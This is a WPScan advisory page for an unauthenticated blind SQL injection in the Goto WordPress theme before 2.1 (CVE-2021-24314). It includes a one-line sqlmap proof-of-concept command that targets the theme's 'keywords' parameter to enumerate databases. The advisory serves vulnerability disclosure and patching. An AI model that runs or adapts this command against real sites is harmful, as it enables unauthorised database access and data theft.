WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

Goto < 2.1 - Unauthenticated Blind SQL Injection

Description

The theme did not sanitise, validate of escape the keywords GET parameter from its listing page before using it in a SQL statement, leading to an Unauthenticated SQL injection issue

Proof of Concept

sqlmap --url="https://example.com/tour-list/?keywords=13&start_date=13" --random-agent -dbs --level=3 --threads=4 --dbms=MySQL -p keywords

Affects Themes

goto
Fixed in version 2.1

References

CVE
CVE-2021-24314
URL
https://m0ze.ru/vulnerability/%5B2021-03-24%5D-%5BWordPress%5D-%5BCWE-89%5D-Goto-WordPress-Theme-v2.0.txt

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

m0ze

Verified

No

WPVDB ID
1cc6dc17-b019-49dd-8149-c8bba165eb30

Timeline

Publicly Published

2021-04-26 (about 1 years ago)

Added

2021-04-29 (about 1 years ago)

Last Updated

2021-05-17 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin